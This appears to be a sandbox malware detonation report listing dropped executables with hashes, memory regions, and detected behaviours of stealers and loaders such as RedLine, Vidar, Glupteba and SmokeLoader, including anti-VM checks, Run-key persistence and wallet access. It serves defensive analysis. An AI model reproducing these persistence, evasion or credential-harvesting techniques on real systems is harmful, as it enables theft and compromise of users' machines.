| SHA256 | 01550ee84ac5a220197177182fd2f3f9c9e845b416d06a384384e3cd62ecb569 |
| SHA512 | 92c0264046f1293b02ccccbb3cb5b80510d2d3a1d1caff23815adb4c715d0aced08e57682c6dcb76fdca70eb46bc819db2a763f050f74de27fbb3946dca504ab |
C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe
| MD5 | 6753c0fadc839415e31b170b5df98fc7 |
| SHA1 | 7adbd92546bc0516013c0f6832ea272cf0606c60 |
| SHA256 | 01550ee84ac5a220197177182fd2f3f9c9e845b416d06a384384e3cd62ecb569 |
| SHA512 | 92c0264046f1293b02ccccbb3cb5b80510d2d3a1d1caff23815adb4c715d0aced08e57682c6dcb76fdca70eb46bc819db2a763f050f74de27fbb3946dca504ab |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f6I3pBrbcTucpuiGuN7jQPmx.exe.log
| MD5 | e07da89fc7e325db9d25e845e27027a8 |
| SHA1 | 4b6a03bcdb46f325984cbbb6302ff79f33637e19 |
| SHA256 | 94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf |
| SHA512 | 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda |
memory/1608-292-0x0000000005B60000-0x0000000005B61000-memory.dmp
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
| MD5 | 592404767648b0afc3cab6fade2fb7d2 |
| SHA1 | bab615526528b498a09d76decbf86691807e7822 |
| SHA256 | 3593247c384586966e5a0e28eb4c4174b31e93c78c7a9e8fef96ec42a152e509 |
| SHA512 | 83819e4956ac6da21c4927fa6edee2b178bc89bcda8fb5f4d0767d0d8310393f50f0f7e76e1a963002626a8176abfa8d864c9229a41e5b61e1a24a32d379dda9 |
memory/2436-289-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
| MD5 | 29903569f45cc9979551427cc5d9fd99 |
| SHA1 | 0487682dd1300b26cea9275a405c8ad3383a1583 |
| SHA256 | eec05dc9ade2a7ee74ea5fb115bdd687b457d1f81841238a61e9775d6cc4bfa6 |
| SHA512 | f8f29c163bfabc90ade4981523feb943656cc20a562e5b4f6f2c6788f781408aec39114a129e765332aa0022d154d4516e9cb56bc01762b114833fddb30d23fb |
memory/4000-326-0x0000000000000000-mapping.dmp
memory/2164-325-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
| MD5 | 592404767648b0afc3cab6fade2fb7d2 |
| SHA1 | bab615526528b498a09d76decbf86691807e7822 |
| SHA256 | 3593247c384586966e5a0e28eb4c4174b31e93c78c7a9e8fef96ec42a152e509 |
| SHA512 | 83819e4956ac6da21c4927fa6edee2b178bc89bcda8fb5f4d0767d0d8310393f50f0f7e76e1a963002626a8176abfa8d864c9229a41e5b61e1a24a32d379dda9 |
memory/5052-286-0x0000000000000000-mapping.dmp
memory/3992-287-0x0000000000000000-mapping.dmp
memory/424-283-0x0000000000000000-mapping.dmp
memory/920-284-0x0000000000EF0000-0x0000000000EF1000-memory.dmp
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
memory/4432-282-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1992-330-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\5981299.exe
| MD5 | 724252e8cc86d50db3dd965a744188c0 |
| SHA1 | 4f96e366267aa778d2f6b11bc35e5aca518a6c30 |
| SHA256 | 786bcc1e15c4c6c7a37ac4908c5991d5589b6d04c74070c0f083287fc74782ff |
| SHA512 | 3443a8230f77555e1c101a6b9a91d6695a45ff1cc5a503cb14ba0b87cefc8a58ab7e3d96df344f2df043fd285bc235e81dae51a8c6317d9262c519f945dd7a91 |
memory/1992-339-0x0000000000B60000-0x0000000000B61000-memory.dmp
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
| MD5 | 161b975933aaae18920d241890000dac |
| SHA1 | 1cbbad54762c6301ad9ad2291159b9d2a141c143 |
| SHA256 | dcdb0bc5e91652e7e3d2269581275c18d8c5eabbde14f9c17c99e5ff49e54a83 |
| SHA512 | 758d1d206c887637d0727ba380d94d4cc1bb8a37cc705dbe62435a45c4ebb0ea111c9e9238261da64dd0d8ee5e27fd9851053dffa0359670a165973dd4f91443 |
C:\Users\Admin\AppData\Roaming\5981299.exe
| MD5 | 724252e8cc86d50db3dd965a744188c0 |
| SHA1 | 4f96e366267aa778d2f6b11bc35e5aca518a6c30 |
| SHA256 | 786bcc1e15c4c6c7a37ac4908c5991d5589b6d04c74070c0f083287fc74782ff |
| SHA512 | 3443a8230f77555e1c101a6b9a91d6695a45ff1cc5a503cb14ba0b87cefc8a58ab7e3d96df344f2df043fd285bc235e81dae51a8c6317d9262c519f945dd7a91 |
memory/4832-334-0x0000000000140000-0x0000000000141000-memory.dmp
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
memory/4884-342-0x00000000052B0000-0x0000000005856000-memory.dmp
memory/4212-340-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
memory/4432-349-0x0000000005890000-0x0000000005EA8000-memory.dmp
memory/852-359-0x0000000000000000-mapping.dmp
memory/1992-355-0x000000001B8E0000-0x000000001B8E2000-memory.dmp
memory/3728-354-0x0000000000000000-mapping.dmp
memory/920-353-0x00000000058F0000-0x00000000058F1000-memory.dmp
C:\Users\Admin\AppData\Roaming\5949319.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
memory/1612-369-0x0000000000000000-mapping.dmp
memory/2456-365-0x0000000003010000-0x000000000303F000-memory.dmp
memory/4368-364-0x0000000000000000-mapping.dmp
memory/2992-362-0x0000000000000000-mapping.dmp
memory/4832-373-0x0000000004D30000-0x0000000004D31000-memory.dmp
memory/1064-375-0x0000000000000000-mapping.dmp
memory/2464-377-0x0000000000000000-mapping.dmp
memory/1612-378-0x0000000000700000-0x0000000000703000-memory.dmp
memory/4112-382-0x0000000000000000-mapping.dmp
memory/256-385-0x0000000000000000-mapping.dmp
memory/2656-390-0x0000000000000000-mapping.dmp
memory/2268-398-0x0000000000000000-mapping.dmp
memory/4368-410-0x000001F9204E0000-0x000001F92054E000-memory.dmp
memory/2256-412-0x0000000000000000-mapping.dmp
memory/4368-416-0x000001F920550000-0x000001F92061F000-memory.dmp
memory/1796-420-0x0000000000000000-mapping.dmp
memory/2256-423-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3992-435-0x00000000052E0000-0x00000000052E1000-memory.dmp
memory/2424-430-0x0000000000000000-mapping.dmp
memory/4452-429-0x0000000000000000-mapping.dmp
memory/2992-428-0x00000000050B0000-0x00000000050B1000-memory.dmp
memory/4912-439-0x0000000000000000-mapping.dmp
memory/3084-443-0x0000000000000000-mapping.dmp
memory/4756-437-0x0000000000000000-mapping.dmp
memory/5052-449-0x0000000003F90000-0x0000000003FC0000-memory.dmp
memory/1064-442-0x0000000004D50000-0x0000000005368000-memory.dmp
memory/2424-454-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5340-453-0x0000000000000000-mapping.dmp
memory/4756-462-0x0000000000700000-0x0000000000701000-memory.dmp
memory/4792-469-0x0000000005F30000-0x0000000005F31000-memory.dmp
memory/5448-467-0x0000000000000000-mapping.dmp
memory/5340-473-0x0000000000700000-0x0000000000701000-memory.dmp
memory/3728-477-0x0000000005330000-0x0000000005331000-memory.dmp
memory/5448-481-0x0000000000400000-0x0000000000414000-memory.dmp
memory/972-484-0x0000000004020000-0x00000000040BD000-memory.dmp
memory/5848-491-0x0000000000000000-mapping.dmp
memory/5776-485-0x0000000000000000-mapping.dmp
memory/5964-497-0x0000000000000000-mapping.dmp
memory/5840-495-0x0000000000000000-mapping.dmp
memory/5988-499-0x0000000000000000-mapping.dmp
memory/6020-501-0x0000000000000000-mapping.dmp
memory/5840-510-0x0000000000700000-0x0000000000701000-memory.dmp
memory/5776-505-0x0000000000400000-0x000000000046D000-memory.dmp
memory/6116-511-0x0000000000000000-mapping.dmp
memory/5840-513-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/4756-514-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/4756-526-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/5240-521-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/4756-518-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/5352-517-0x0000000000000000-mapping.dmp
memory/6124-512-0x0000000000000000-mapping.dmp
memory/4756-528-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/4756-530-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/5848-535-0x00000000047D0000-0x00000000047D1000-memory.dmp
memory/3084-533-0x0000000005200000-0x0000000005818000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
181s
Max time network
1781s
Command Line
Signatures
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-JJV0D.tmp\ultradumnibour.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\2115.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\2115.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Windows\SysWOW64\WerFault.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\2115.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 876 set thread context of 444 | N/A | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe |
| PID 3084 set thread context of 3708 | N/A | C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe | C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe |
| PID 4508 set thread context of 1120 | N/A | C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe | C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe |
| PID 3860 set thread context of 6180 | N/A | C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe | C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe |
| PID 7516 set thread context of 7748 | N/A | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe |
| PID 6752 set thread context of 8160 | N/A | C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe | C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-VQT8M.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-77HJ3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-0L1J3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IP6RR.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files\Common Files\MLZGUBILYF\ultramediaburner.exe | C:\Users\Admin\AppData\Local\Temp\is-JJV0D.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ipseccmd.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-QME82.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-CF1IM.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\9tgLoG72Gq9TsKPb2rKWvimJ.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\mask_svc.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-KADTJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-ABNG0.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-60LAC.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-TJ98K.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-TS1DF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libass.dll | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-KI3PR.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libCommon.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-7OB77.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-R973U.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-6S643.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-ARCA4.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-E2P77.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-6VPP5.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-VIEGL.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-U9J1A.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\9tgLoG72Gq9TsKPb2rKWvimJ.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\tunnle.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\polstore.dll | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-6AIQM.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\QtProfiler.exe | C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
